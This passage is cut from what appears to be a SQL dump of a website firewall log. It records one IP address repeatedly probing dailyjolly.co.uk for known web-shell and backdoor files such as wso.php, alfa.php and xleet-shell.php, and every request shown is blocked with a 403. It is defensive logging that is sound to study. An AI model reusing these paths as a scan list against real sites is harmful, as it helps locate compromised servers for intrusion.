Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lpbT2CUEginD6OxN5KWRVcFZ',0,1674319834.1984,213,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/rhuk_milkyway/index.php?http://dailyjolly.co.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zW0c1EeCHTAatXDMNmV94Psf',0,1674319836.8630,197,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/+theme+/index.php?http://dailyjolly.co.uk/templates/+theme+/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','G2KvaV5EosSw0qY1meHRZPpM',0,1674319840.1116,194,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/+theme+/error.php?http://dailyjolly.co.uk/templates/+theme+/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','w4HOdMKTUkb0gtCqpQzmEsZ8',0,1674319842.9804,261,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/beez3/index.php?http://dailyjolly.co.uk/templates/beez3/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YXwrSKyFtcs19qClRM7VkWOJ',0,1674319844.6754,175,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/beez3/error.php?http://dailyjolly.co.uk/templates/beez3/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lvf8uizbwMEoRPemZOY6U1Dd',0,1674319846.1769,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/beez5/index.php?http://dailyjolly.co.uk/templates/beez5/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rezPdKZ8Lyb3R92cuXpqVv7S',0,1674319849.8286,206,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/beez5/error.php?http://dailyjolly.co.uk/templates/beez5/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rDLnVwi8ZFUta3vjRhHul5oG',0,1674319853.9561,202,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/beez_20/index.php?http://dailyjolly.co.uk/templates/beez_20/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lori7GKLpmeq45Vx3bUXfaSg',0,1674319858.4071,196,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/beez_20/error.php?http://dailyjolly.co.uk/templates/beez_20/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3pWoyuNiSPq79x8Tt62d4nQF',0,1674319860.5490,222,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/protostar/index.php?http://dailyjolly.co.uk/templates/protostar/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3qOXthU419eWv8o26sNFPAx7',0,1674319864.3572,261,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/protostar/error.php?http://dailyjolly.co.uk/templates/protostar/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2nEDe3T8mYAuvO4Z1rRhkzUs',0,1674319865.7903,176,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/atomic/index.php?http://dailyjolly.co.uk/templates/atomic/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MDVfm0c74YjON52X9uZCxvgJ',0,1674319869.7565,215,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/templates/atomic/error.php?http://dailyjolly.co.uk/templates/atomic/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xo7MraZQpE1T43vH89DVNl56',0,1674319871.4545,197,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/network/wp-footer.php?http://dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QjFGVKlg0T1sJUWAiaStuobc',0,1674319875.3018,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/vuln.php?http://dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','c6RuhN4F07jpIdLWHGgqfYPS',0,1674319878.5679,207,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/upel.php?http://dailyjolly.co.uk/upel.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','A4rwtsB1Smhkid8QGCXRyebF',0,1674319881.8687,229,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/uploads/+year+/+month+/?http://dailyjolly.co.uk/wp-content/uploads/+year+/+month+/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZoP49q0l8fWHX7c1yFxVCTIw',0,1674319888.0160,178,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/license.php?http://dailyjolly.co.uk/license.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','v8IClicSd67m1kUnpVxNTwED',0,1674319890.2088,216,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/ppus/up.php?http://dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HPopmSwd5eMvCjRx97tALFO3',0,1674319895.4392,212,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/098.php?http://dailyjolly.co.uk/098.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ldcv2iD3sQbSXHyJraxq9GK1',0,1674319898.6637,206,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/new_license.php?http://dailyjolly.co.uk/new_license.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UrjgKYCBhHpMF1qsaO0ebA4w',0,1674319903.3376,200,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php?http://dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VcPEXaHJg1mD7RCfy3NLbojM',0,1674319905.9653,216,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php?http://dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dCVBQv8SLTM7We1s6htEojA3',0,1674319908.7408,189,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/css/index.php?http://dailyjolly.co.uk/wp-admin/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','buYkongAFtzfcBvROK1SlPMI',0,1674319913.4082,172,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1975.phP?http://dailyjolly.co.uk/1975.phP','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5F6dz9MZwg4Aa8CQI7muktGB',0,1674319914.6628,185,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1975.php?http://dailyjolly.co.uk/1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xF2Pj98o1yn4IeYmkKhLDwTV',0,1674319919.4249,233,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/radio.php?http://dailyjolly.co.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6C8T3sPi4vnmkIDQc7lhwjUt',0,1674319921.4218,173,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/wp-class.php?http://dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YafG9M43BQV6ln2zXiRuIHCb',0,1674319925.6468,192,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xleet-shell.php?http://dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vt0O8Ii4RWLHbalVUqujNeh6',0,1674319929.0986,248,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/radio.php?http://dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Nrx9Kzhk20afCPEOJjcZXobw',0,1674319932.3419,209,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/radio.php?http://dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zgXi8AIarutwybDhl4SCLjFO',0,1674319935.0210,170,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/fx.php?http://dailyjolly.co.uk/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XEn4WyUCIs7JG0tQ6OovxYwS',0,1674319936.7120,234,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/?http://dailyjolly.co.uk/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0MtZQFk9b2oqSxDKX7LynuGc',0,1674319939.7149,195,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/?http://dailyjolly.co.uk/////////////////////////////////////////','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yBbNE4lGRoxedtkjcfMJuQpm',0,1674319942.9934,204,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/images/atomlib.php?http://dailyjolly.co.uk/wp-admin/images/atomlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XH7t4EujOTz9QSAmC8c5ULf2',0,1674319945.7741,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/gel4y.php?http://dailyjolly.co.uk/gel4y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3fIhQBS98GTWdxPUtcEyXAYM',0,1674319950.8346,262,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/jindex.php?http://dailyjolly.co.uk/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RQ0jfSkvqGaim41ChJFwAbc6',0,1674319953.8555,284,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/about.php?http://dailyjolly.co.uk/wp-content/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2xjvIqgLQUPE7eknocbHyWMT',0,1674319956.3532,240,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sh.php?http://dailyjolly.co.uk/sh.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Cw9prhHSY0MfL1iK5ogmRdye',0,1674319962.6053,224,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/991176.php?http://dailyjolly.co.uk/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','j8XpFe4L3m7rvGyVwfu19gYJ',0,1674319966.1794,192,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/maint/about.php?http://dailyjolly.co.uk/wp-admin/maint/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FlhcapfJ89uX54QHqsiDUe3j',0,1674319970.8483,206,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/fox.php?http://dailyjolly.co.uk/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3a4HLktNwBOde9IzpiXnbCrf',0,1674319976.4433,196,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/x.php?http://dailyjolly.co.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iVtDve5sLANUZCYIxaEJk4WF',0,1674319980.0502,222,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/fw.ph?http://dailyjolly.co.uk/fw.ph','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nSWjUEdBt3yYqoL809rTcpQ6',0,1674319983.4225,233,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/server.php?http://dailyjolly.co.uk/server.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','voiXnQ6J9zGxFL3SN4fb8wHe',0,1674319988.5870,238,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/fw.php?http://dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IKSpP9EVn5Ubs8yd1uTjqLH7',0,1674319991.4672,196,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/4.php?http://dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Rj2Bn5bF0hMwsUX7rCyPfKd8',0,1674319994.5666,178,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/5.php?http://dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kOm03fVWu1FwXHIxC47Pst9T',0,1674319997.1142,170,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/images/about.php?http://dailyjolly.co.uk/images/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IBHqk49csw0mefyQhbGgAMit',0,1674320000.0308,195,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-load.php?http://dailyjolly.co.uk/wp-load.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cyeJhlp174SP9wVrFxMaW85L',0,1674320005.3768,237,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/fw.php?http://dailyjolly.co.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','e2Gn3NED68fVKHkmbrswMRoa',0,1674320011.0765,201,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mari.php?http://dailyjolly.co.uk/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Z8m4cthQM3q95FNIWrJpvlix',0,1674320014.6216,175,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/swm.php?http://dailyjolly.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MfJkdy2nKrR9xbaUIShLC7sD',0,1674320017.2768,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/radio.php?http://dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','k8KDcB0LC5V92ORz6TSvsiEI',0,1674320020.2467,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/about.php?http://dailyjolly.co.uk/wp-includes/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nHYoG1bKS4gjPpZBWNadQki2',0,1674320023.1077,199,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/wso.php?http://dailyjolly.co.uk/wp-content/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','b6yKXYaRCMfA3FdSgPZT2Dkp',0,1674320024.9670,182,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/wso.php?http://dailyjolly.co.uk/wp-admin/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1oKhmlrT6efa5DWG3BjIiXYt',0,1674320028.1767,265,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/w3llstore.php?http://dailyjolly.co.uk/w3llstore.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iUdrg67wc1ykPXSHKN38sBoL',0,1674320031.9135,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/fx.php?http://dailyjolly.co.uk/wp-content/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4QJqCIGEhz3pnfB1WrP7XMVZ',0,1674320035.0610,187,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/x.php?http://dailyjolly.co.uk/wp-content/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JVMehr7qFSIo3HpxWuk8AKUX',0,1674320038.5245,203,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/alfa.php?http://dailyjolly.co.uk/wp-admin/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','brIJChQ4O3VFMlZ5Ad9aSGKT',0,1674320040.1588,184,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/gank.php.PhP?http://dailyjolly.co.uk/gank.php.PhP','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RM2ndK0sjSoTuHip3mWZC5cV',0,1674320043.9602,194,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/style.php?http://dailyjolly.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lZGoEKzirtukpjAfxnVTROgd',0,1674320045.8954,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/s_e.php?http://dailyjolly.co.uk/s_e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tGe9b7qd5ROZzhCDjfJL3k2B',0,1674320049.5628,175,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/s_ne.php?http://dailyjolly.co.uk/s_ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XFJRC0wofcK7qLOPdrSHh3Ik',0,1674320054.0216,203,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/beence.php?http://dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Vgzf9lDLx7Iv82wUm14CAtOy',0,1674320057.5449,231,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-signin.php?http://dailyjolly.co.uk/wp-signin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MQhFs5ZmIkBvr8VYPuWSJ1oz',0,1674320062.1369,235,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/moduless.php?http://dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wGYS49R1DnB2pH0TLbmakzQU',0,1674320064.1304,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/export.php?http://dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6yK9SPFuRLHtkXAbYsoJG0hj',0,1674320066.5346,197,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/legion.php?http://dailyjolly.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 